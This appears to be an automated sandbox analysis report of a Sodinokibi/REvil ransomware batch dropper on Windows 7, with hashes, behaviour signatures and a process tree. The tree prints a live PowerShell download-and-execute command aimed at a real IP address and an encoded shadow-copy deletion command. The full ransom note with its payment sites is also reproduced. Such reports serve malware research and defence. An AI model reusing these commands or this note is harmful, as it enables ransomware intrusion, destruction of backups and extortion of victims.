Analysis

  • max time kernel
    17s
  • max time network
    55s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    15-05-2020 20:10

General

  • Target

    74b8e8ad8fe5aea82ec95a707e3c2b94.bat

  • Size

    214B

  • MD5

    220dc0fc858c664ba5223cbab7e4b312

  • SHA1

    94f095bd648c7c3f4845e3c419b74baa7662f2ae

  • SHA256

    94d89a44ea5da3649df80f6898cb30415f2df92c0060d36d5f9afa3806862a2a

  • SHA512

    119c413acb39f51f4d668c5bc48793f60b91717e1623e22d666221c26e78cfa3667e7aa2141b26e15aa3936d86ba498ae280decd9889a77f8706459d0f295772

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/74b8e8ad8fe5aea82ec95a707e3c2b94

Extracted

Path

C:\ysm83m-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension ysm83m. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CFB753AC85BE73BF 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/CFB753AC85BE73BF Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: Vhvlj5h05BkFWaVAmEvaCDVLDtBvP/Sqpbjx1pxTECzq00OeLCBzd4dKj8yJ+WNa 3K0vQklmZgN/C7Cx7+lzpfb06dOCZS/fUeBIknazwx43AEP9HwmgujY8Ft/OKTv9 RQU0ojIOsKqSDomM+t0pbJqB2NB17QHZlvHRDVjmnNp2xpx+xa4f3t+yKiCS5UCC RYyhz8KJCdK7i26wPD31287SmnoLQNI7aUbseq7mPmP3wyBUjncdE5MJ9ShDwUcg gA4F7i0iJYiSAhBdTismwtlE0CpgWF44zh7YeRWelWHlJiURv03PUF5bqhPAT+DJ 0AP8/VjE4y0ffJWjgkOBnPF/dXPZKQQxrfg10pnJLyFUL0+l7tQdpl06YcBinRwo 5EFSmupb03CgBwqED73hQqWDHGzagTfJ+2nzWfDB/I2vd+VhJ80TqF8d4ZK7mYvJ 9vajL7cw1+lTlekWqkxswzegg6IzuE1iQMkL/47fMPf8L0MLU7fXzNNJiM4KwDwc iwop9etSMoGL+BUoqWdTTQNKjFRfCWEULZaiw1icin+7SW88sd+iehAZsCp5O6fg hoNxLTxnTSXtmSwHOctaB2BKcN5Xco5pyVesomIugON1iNhJo9Fs/fcxdg5qKcdu YHza87CAOkNoi8aGXVu2nwxwBjp754AQdLPO3fsBbZ82QnhddcELyBFmZoL1KChm qdabWPu+trTKpnM/STIdGKHnUSTkvh2rnD7sjdG7EGNosVQzamPHQ9kyGawemIVu 9/Pv29xFzbXtdJrTBmiuEh4/tRqBJYxj+RccjyKq/9soA6Prgu3NxN/lnv2Xx+Hi Vyd+UpWMjMrFqHDKnpuSrbouhLhn9V5qH/4ctlh85o8PncplOZ5T/LpLw+dRHF06 6CFDZvrjHmH9ZD5LX3RarfGx4nITFyyEEn5O5nIdpT2P11jTLkVQwLexsv8Plgt1 Nz2jDhsHzqf1Bs45lshExaBWjdfS7XwMMQBwvqnQpzxeH3CncBxjq4GMIV1Yb+Wj 5CLM2FAwI9aJQIJwD/GJIgWOKAZU7uLDGspkuFu4RxSpyBeyd/qFfEXi3pnK840U jw+pqE0dFjcGvmdTwtACsAipocThvqhIraOIm41vT1URd9hGAr7UOLOBp/lt/I0S EMcCbojk5dTgl85LLVgwoWJ8zZrQnyOS6XZGk6on2NcuMim26le7eGznt2bmDrqf sKpp5AtYZXEMQ5TZYW/WRdhXFpFP5YbKCisN6GcylmDXVFAMUpBDFlA18a3SuOKX jv8HQPL4nYqmO2IwYJRSlh2IN0LjED91H3OBm8V/S3w= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CFB753AC85BE73BF

http://decryptor.cc/CFB753AC85BE73BF

Signatures

  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Enumerates connected drives 3 TTPs
  • Drops file in Program Files directory 26 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\74b8e8ad8fe5aea82ec95a707e3c2b94.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1524
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/74b8e8ad8fe5aea82ec95a707e3c2b94');Invoke-ZUMTYKU;Start-Sleep -s 10000"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Drops file in Program Files directory
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:108
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1172
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:464

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms